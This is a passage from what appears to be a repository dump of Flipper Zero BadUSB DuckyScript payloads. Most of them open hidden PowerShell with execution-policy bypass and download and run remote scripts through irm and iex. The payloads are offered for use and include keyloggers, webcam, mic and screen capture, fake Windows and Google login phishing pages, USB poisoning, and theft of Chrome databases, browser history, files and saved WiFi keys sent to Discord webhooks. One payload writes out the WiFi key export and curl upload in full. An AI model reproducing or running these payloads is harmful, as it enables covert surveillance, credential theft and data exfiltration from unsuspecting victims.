13 | STRING powershell -NoP -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/Posh-LAN/main/Posh-LAN-Tools.ps1 | iex 14 | ENTER 15 | 16 | -------------------------------------------------------------------------------- /MEMZ-In-Powershell/MEMZ-In-Powershell.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: MEMZ-In-Powershell 3 | REM Author: @beigeworm 4 | REM Description: This script recreates visual effects insipred by the classin MEMZ program 5 | REM Target: Windows 10 6 | 7 | REM some setup for dukie script 8 | DEFAULT_DELAY 100 9 | 10 | REM open powershell (remove -W Hidden to show the window) 11 | DELAY 1000 12 | GUI r 13 | DELAY 750 14 | STRING powershell -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/MEMZ-In-Powershell/main.ps1 | iex 15 | ENTER 16 | 17 | 18 | -------------------------------------------------------------------------------- /Pranks/Start Windows-93 (parody edition).txt: -------------------------------------------------------------------------------- 1 | REM Title: Start Windows-93 (parody edition) 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Kills all running egde processes then opens edge in fullscreen on windows-93. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 100 8 | 9 | REM open cmd and kill edge. 10 | GUI r 11 | DELAY 500 12 | STRING cmd /c taskkill /F /IM msedge.exe & start msedge -kiosk www.windows93.net & exit 13 | DELAY 200 14 | ENTER 15 | DELAY 1000 16 | REM use this for fullscreen if needed 17 | -------------------------------------------------------------------------------- /Pranks/System Message.txt: -------------------------------------------------------------------------------- 1 | REM Title: System Message 2 | REM Author: @beigeworm 3 | REM Description: This will open a Message prompt on the Target. 4 | REM Target: Windows 10 5 | 6 | REM ============================================================================= 7 | 8 | REM some setup for dukie script. 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell (remove -W Hidden to show the window) 12 | GUI r 13 | DELAY 750 14 | STRING powershell -W Hidden -Exec Bypass -C "Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('HACKED MESSAGE BOX')" 15 | ENTER 16 | -------------------------------------------------------------------------------- /Record-Screen-GUI/Record-Screen-GUI.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Screen Recorder GUI Tool. 2 | REM Author: @beigeworm 3 | REM Description: This script creates a GUI window for recording the screen to .mkv file. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Record-Screen-GUI/main.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Webcam-to-Discord/Webcam-to-Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: Webcam to Discord 2 | REM Author: @beigeworm 3 | REM Description: download a webcam.dll file, find a webcam cand take a picture then send it to discord. 4 | REM Target: Windows 10 5 | 6 | REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL 7 | 8 | REM some setup for dukie script 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell (remove "-W H" to show the window) 12 | DELAY 1000 13 | GUI r 14 | DELAY 750 15 | STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/rhmMua | iex 16 | ENTER 17 | 18 | 19 | -------------------------------------------------------------------------------- /Computer-Acid/Computer-ACID-Prank.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's GDI Effects Prank. 2 | REM Author: @beigeworm 3 | REM Description: This script uses GDI effects on the users display to create visual effects for 90 seconds. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Computer-Acid/main.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Webhook-Spammer-GUI/Webhook-Spammer-GUI.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Webhook Spammer GUI Tool. 2 | REM Author: @beigeworm 3 | REM Description: This script creates a GUI for Spamming a webhook with text or an image. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Webhook-Spammer-GUI/main.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Image-to-Console/Image-to-Console.txt: -------------------------------------------------------------------------------- 1 | REM Title: Image To Console 2 | REM Author: @beigeworm 3 | REM Description: Convert an image to Powershell console. 4 | REM Target: Windows 10 5 | 6 | REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL 7 | 8 | REM some setup for dukie script 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell (remove "-W H" to show the window) 12 | DELAY 1000 13 | GUI r 14 | DELAY 750 15 | STRING powershell -NoP -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Image-to-Console/main.ps1 | iex 16 | ENTER 17 | 18 | 19 | -------------------------------------------------------------------------------- /Shortcut-Spam/main.ps1: -------------------------------------------------------------------------------- 1 | $n = 100 2 | $i = 0 3 | 4 | while($i -lt $n) 5 | { 6 | $num = Get-Random 7 | $Location = "C:\Windows\System32\rundll32.exe" 8 | $WshShell = New-Object -ComObject WScript.Shell 9 | $Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk") 10 | $Shortcut.TargetPath = $Location 11 | $Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll" 12 | $Shortcut.IconLocation = "hotplug.dll,0" 13 | $Shortcut.Description ="Device Removal" 14 | $Shortcut.WorkingDirectory ="C:\Windows\System32" 15 | $Shortcut.Save() 16 | Start-Sleep -Milliseconds 10 17 | $i++ 18 | } 19 | -------------------------------------------------------------------------------- /Network-Enumeration-GUI/Network-Enumeration-GUI.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's LAN Device Enumeration GUI Tool. 2 | REM Author: @beigeworm 3 | REM Description: This script creates a GUI for enumerating devices on the local network. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Network-Enumeration-GUI/main.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Social-Search-GUI/Username-Search-GUI.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Username Search GUI Tool. 2 | REM Author: @beigeworm 3 | REM Description: This script creates a GUI for searching social media and other sites with a specified Username. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Social-Search-GUI/main.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Speech-to-Discord/Speech-to-Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: Speech to Discord 2 | REM Author: @beigeworm 3 | REM Description: Uses assembly 'System.Speech' to take audio input and convert to text and then send the text to discord. 4 | REM Target: Windows 10 5 | 6 | REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL 7 | 8 | REM some setup for dukie script 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell (remove "-W H" to show the window) 12 | DELAY 1000 13 | GUI r 14 | DELAY 750 15 | STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bw0speechdc | iex 16 | ENTER 17 | 18 | 19 | -------------------------------------------------------------------------------- /Beigeworms-Tool-Suite/Beigeworms-Tool-Suite.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Tool Suite GUI 2 | REM Author: @beigeworm 3 | REM Description: This script Starts a GUI with a huge set of tools. 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 8 | 9 | REM some setup for dukie script 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell 13 | DELAY 1000 14 | GUI r 15 | DELAY 750 16 | STRING powershell -NoP -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Beigeworms-Tool-Suite/main.ps1 | iex 17 | ENTER 18 | 19 | 20 | -------------------------------------------------------------------------------- /Chrome-Extension-Keylogger/README.md: -------------------------------------------------------------------------------- 1 |

Keylogger To WebHook - Chrome Extension

2 | 3 | SYNOPSIS 4 | 5 | Creates the neccessary files for a chrome extension that logs all keystrokes on any website. 6 | Then sends the collected keys to a discord webhook. 7 | 8 | USAGE 9 | 1. Replace YOUR_WEBHOOK_HERE with your webhook. (in the .txt file.) 10 | 2. add the txt to your badUSB device and run the script. 11 | 3. test by going to a website in chrome browser (eg. google.com) and type some keys 12 | 4. Wait 20 seconds and check webhook for results. 13 | 14 | CREDITS - Kudos and credit to jakov for the js! 15 | -------------------------------------------------------------------------------- /Filetype-Organizer/Filetype-Organizer.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Filetype Organizer 3 | REM Author: @beigeworm 4 | REM Description: This script searches the users folder for any files with a specific filetype and copies them to the user folder. 5 | REM Target: Windows 10 6 | 7 | REM some setup for dukie script 8 | DEFAULT_DELAY 100 9 | 10 | REM open powershell (remove -W Hidden to show the window) 11 | DELAY 1000 12 | GUI r 13 | DELAY 750 14 | STRING powershell -NoP -Ep Bypass -C cd $env:USERPROFILE ;irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Filetype-Organizer/main.ps1 | iex 15 | ENTER 16 | 17 | -------------------------------------------------------------------------------- /Tools/Anti-AFK-Tool.txt: -------------------------------------------------------------------------------- 1 | REM Title: Anti-AFK Tool 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Press random movement keys (Anti-AFK) 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 100 8 | DELAY 1000 9 | GUI r 10 | DELAY 500 11 | STRING powershell -NoP -NonI -Exec Bypass 12 | ENTER 13 | DELAY 4000 14 | STRING Add-Type -AssemblyName System.Windows.Forms;while ($true) {$key = @('w','a','s','d');$randomKey = (Get-Random -InputObject $key -Count 1);[System.Windows.Forms.SendKeys]::SendWait($randomKey);[System.Windows.Forms.SendKeys]::SendWait($randomKey);sleep 1} 15 | ENTER 16 | -------------------------------------------------------------------------------- /Wallpaper-Jumpscare/Wallpaper-Jumpscare.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Wallpaper Jump Scare. 2 | REM Author: @beigeworm 3 | REM Description: This script changes downlaods a scary image and sets it as a wallpaper. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Wallpaper-Jumpscare/main.ps1 14 | | iex 15 | CTRL-SHIFT ENTER 16 | DELAY 3000 17 | ALT y 18 | 19 | -------------------------------------------------------------------------------- /Record-Screen-to-Discord/Record-Screen-to-Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: Record Screen to Discord 2 | REM Author: @beigeworm 3 | REM Description: This script records the screen for a specified time to a mkv file, then sends the file to a discord webhook. 4 | REM Target: Windows 10 5 | 6 | REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL 7 | 8 | REM some setup for dukie script 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell (remove "-W H" to show the window) 12 | DELAY 1000 13 | GUI r 14 | DELAY 750 15 | STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bw0screendc | iex 16 | ENTER 17 | 18 | 19 | -------------------------------------------------------------------------------- /Screen-to-Discord/Screenshot-to-Discord.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Screenshot to discord webhook 3 | REM Author: @beigeworm 4 | REM Description: This script takes a screenshot of the desktop and posts to a discord webhook. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove "-W H" to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw0_sc_to_dc | iex 18 | ENTER 19 | 20 | 21 | -------------------------------------------------------------------------------- /Wifi-Networks-to-Discord/Discord-WiFi-Grabber.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's saved WiFi to Discord Webhook. 2 | REM Author: @beigeworm 3 | REM Description: This script collects saved WiFi info and posts results to a discord webhook. 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 8 | 9 | REM some setup for dukie script 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove "-W H" to show the window) 13 | DELAY 1000 14 | GUI r 15 | DELAY 750 16 | STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_wifi_to_dc | iex 17 | ENTER 18 | 19 | 20 | -------------------------------------------------------------------------------- /USB-Poison/USB-Poison.txt: -------------------------------------------------------------------------------- 1 | REM Title: USB Poison 2 | REM Author: @beigeworm 3 | REM Description: This script runs quietly in the background waiting for new USB storage devices. 4 | REM Description: When a new storage device connects, this script will copy a desired file to the root of newly connected drive. 5 | REM Target: Windows 10 6 | 7 | REM some setup for dukie script 8 | DEFAULT_DELAY 100 9 | 10 | REM open powershell (remove "-W H" to show the window) 11 | DELAY 1000 12 | GUI r 13 | DELAY 750 14 | STRING powershell -NoP -Ep Bypass -W H -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' irm is.gd/bw0poison | iex 15 | ENTER 16 | 17 | -------------------------------------------------------------------------------- /Browser-History-to-Discord/Browser-History-to-Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's browser history to Discord Webhook. 2 | REM Author: @beigeworm 3 | REM Description: This script collects browser history and posts results to a discord webhook. 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 8 | 9 | REM some setup for dukie script 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove "-W H" to show the window) 13 | DELAY 1000 14 | GUI r 15 | DELAY 750 16 | STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw0bhtodc | iex 17 | ENTER 18 | 19 | 20 | -------------------------------------------------------------------------------- /Record-Mic-to-Discord/Record-Mic-to-Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: Record Microphone to Discord 2 | REM Author: @beigeworm 3 | REM Description: This script finds the default microphone and records for a specified time to a mp3 file, then sends the file to a discord webhook. 4 | REM Target: Windows 10 5 | 6 | REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL 7 | 8 | REM some setup for dukie script 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell (remove "-W H" to show the window) 12 | DELAY 1000 13 | GUI r 14 | DELAY 750 15 | STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bw0mictodc | iex 16 | ENTER 17 | 18 | 19 | -------------------------------------------------------------------------------- /Clean-History/Clean-History.txt: -------------------------------------------------------------------------------- 1 | REM Title: History Cleaner 2 | REM Author: @beigeworm 3 | REM Description: This script empties the temp folder and recycle bin, clear run box and powershell history 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 8 | 9 | REM some setup for dukie script 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove "-W H" to show the window) 13 | DELAY 1000 14 | GUI r 15 | DELAY 750 16 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Clean-History/main.ps1 | iex 17 | ENTER 18 | 19 | 20 | -------------------------------------------------------------------------------- /Discord-Infostealer/System-Info-to-Discord.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's system information to discord webhook 3 | REM Author: @beigeworm 4 | REM Description: This script gathers system information and posts to a discord webhook address with the results. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove "-W H" to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_info_to_dc | iex 18 | ENTER 19 | 20 | -------------------------------------------------------------------------------- /Mouse-Monitor-to-Discord/Mouse-Activity-to-Discord.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's monitor mouse activity to Discord Webhook. 3 | REM Author: @beigeworm 4 | REM Description: This script monitors mouse activity and posts results to a discord webhook. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove -W Hidden to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_mm_to_dc | iex 18 | ENTER 19 | 20 | 21 | -------------------------------------------------------------------------------- /Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's Exfiltrate files to Discord 3 | REM Author: @beigeworm 4 | REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a Discord Webhook. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace WEBHOOK_HERE with your Discord Webhook. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove -W Hidden to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $dc='WEBHOOK_HERE'; irm is.gd/bw0_ex_to_dc | iex 18 | ENTER 19 | 20 | -------------------------------------------------------------------------------- /Google-Phishing/Google-Phish-to-Discord.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's Fake Google Phishing page to Discord Webhook. 3 | REM Author: @beigeworm 4 | REM Description: This script makes a Fake Google Phishing page and posts results to a discord webhook. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove -W Hidden to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw0_gp_to_dc | iex 18 | ENTER 19 | 20 | 21 | -------------------------------------------------------------------------------- /Mouse-Clicks-Recorder/Mouse-Clicks-Recorder.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Mouse Clicks Recorder 3 | REM Author: @beigeworm 4 | REM Description: Record your mouse clicks and positions along with interval time between clicks.. (for loading screens etc.) 5 | REM Description: Play them back later and automate clicky tasks! 6 | REM Target: Windows 10 7 | 8 | REM some setup for dukie script 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell (remove -W Hidden to show the window) 12 | DELAY 1000 13 | GUI r 14 | DELAY 750 15 | STRING powershell -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Mouse-Clicks-Recorder/main.ps1 | iex 16 | ENTER 17 | -------------------------------------------------------------------------------- /Uvnc-Remote-Desktop/Uvnc-Remote-Desktop.txt: -------------------------------------------------------------------------------- 1 | REM Title: Uvnc-Remote-Desktop 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Downloads Uvnc client to machine and runs winvnc.exe 4 | REM Target: Windows 10 5 | 6 | REM *REQUIREMENTS* 7 | REM admin required for disable USB function. 8 | 9 | REM some setup for dukie script. 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove -W Hidden to show the window). 13 | GUI r 14 | DELAY 750 15 | STRING powershell -Exec Bypass -C $ip = ''; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Uvnc-Remote-Desktop/main.ps1 | iex 16 | CTRL-SHIFT ENTER 17 | DELAY 2500 18 | ALT y 19 | -------------------------------------------------------------------------------- /Chrome-Extension-Keylogger/Chrome-Extension-Keylogger.txt: -------------------------------------------------------------------------------- 1 | REM Title: Keylogger To WebHook - Chrome Extension 2 | REM Author: @beigeworm 3 | REM Description: Creates the neccessary files for a chrome extension that logs all keystrokes on any website. Then sends the collected keys to a discord webhook. 4 | REM Target: Windows 10 5 | REM *SETUP* 6 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | REM some setup for dukie script 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell (remove "-W H" to show the window) 12 | DELAY 1000 13 | GUI r 14 | DELAY 750 15 | STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/lp84nbw0 | iex 16 | ENTER 17 | -------------------------------------------------------------------------------- /Discord-Keylogger/Keylogger-to-Discord.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's Keyloggger to Discord Webhook. 3 | REM Author: @beigeworm 4 | REM Description: This script logs all Keystrokes and posts results to a discord webhook when the keyboard goes inactive for more than 10 secs. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove "-W H" to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_kl_to_dc | iex 18 | ENTER 19 | 20 | 21 | -------------------------------------------------------------------------------- /File-Monitor-to-Discord/File-Changes-to-Discord.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's monitor file changes to Discord Webhook. 3 | REM Author: @beigeworm 4 | REM Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove -W Hidden to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_fm_to_dc | iex 18 | ENTER 19 | 20 | 21 | -------------------------------------------------------------------------------- /Pranks/5 second Screen Kill.txt: -------------------------------------------------------------------------------- 1 | REM Title: 5 Second Display Kill 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to kill all displays for a short period of time. 4 | REM Target: Windows 10,11 5 | 6 | 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window) 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | STRING (Add-Type '[DllImport("user32.dll")]public static extern int SendMessage 19 | STRING (int hWnd, int hMsg, int wParam, int lParam);' -Name a -Pas)::SendMessage(-1,0x0112,0xF170,2);sleep 5;exit 20 | ENTER 21 | -------------------------------------------------------------------------------- /Screen-to-Telegram/Screenshot-to-Telegram.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Screenshot to Telegram Bot Chat 3 | REM Author: @beigeworm 4 | REM Description: This script takes a screenshot of the desktop and posts to a Telegram Bot Chat. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace TELEGRAM_TOKEN_HERE with your Telegram Token. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove "-W H" to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Screen-to-Telegram/main.ps1 | iex 18 | ENTER 19 | 20 | 21 | -------------------------------------------------------------------------------- /Voice-Activated-DarkMode/Voice-Activated-DarkMode.txt: -------------------------------------------------------------------------------- 1 | REM Title: Voice-Activated-DarkMode 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Control Windows theme with your voice. Say 'Light' OR 'Dark' to change theme. 4 | REM Target: Windows 10 5 | 6 | REM *REQUIREMENTS* 7 | REM admin required for disable USB function. 8 | 9 | REM some setup for dukie script. 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove -W Hidden to show the window). 13 | GUI r 14 | DELAY 750 15 | STRING powershell -Exec Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Voice-Activated-DarkMode/main.ps1 | iex 16 | CTRL-SHIFT ENTER 17 | DELAY 2500 18 | ALT y 19 | -------------------------------------------------------------------------------- /Win10-Phishing/Fake-Windows-10-Logon.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook. 2 | REM Author: @beigeworm 3 | REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 8 | 9 | REM some setup for dukie script 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove "-W H" to show the window) 13 | DELAY 1000 14 | GUI r 15 | DELAY 750 16 | STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_win10_to_dc | iex 17 | ENTER 18 | -------------------------------------------------------------------------------- /Win11-Phishing/Fake-Windows-11-Logon.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook. 2 | REM Author: @beigeworm 3 | REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 8 | 9 | REM some setup for dukie script 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove "-W H" to show the window) 13 | DELAY 1000 14 | GUI r 15 | DELAY 750 16 | STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_win11_to_dc | iex 17 | ENTER 18 | -------------------------------------------------------------------------------- /OSINT/Discord WiFi Grabber 2.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Wifi Grabber to Discord 2 3 | REM Author: @beigeworm 4 | REM Description: Uses Powershell to gather Wifi info and send it via Discord. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace YOUR_WEBHOOK_HERE with your discord webhook. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove -W Hidden to show the window) 14 | GUI r 15 | DELAY 750 16 | STRING powershell -NoP -NonI -Exec Bypass 17 | ENTER 18 | DELAY 4000 19 | 20 | STRING cd $env:tmp;netsh wlan export profile key=clear;Select-String -Path Wi*.xml -Pattern 'keyMa*' > Wi-Fi;curl.exe -F "f=@Wi-Fi" "YOUR_WEBHOOK_HERE";rm "Wi-*" 21 | DELAY 500 22 | ENTER 23 | -------------------------------------------------------------------------------- /Chrome-DB-to-Discord/Chrome-DB-to-Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: Chrome DB to Discord 2 | REM Author: @beigeworm 3 | REM Description: Chrome stores visited websites, password entries, Address entries, email entries and more inside database files 4 | REM Description: They can be extracted to a discord chat and viewed in something like 'DB Browser'. 5 | REM Target: Windows 10 6 | 7 | REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL 8 | 9 | REM some setup for dukie script 10 | DEFAULT_DELAY 100 11 | 12 | REM open 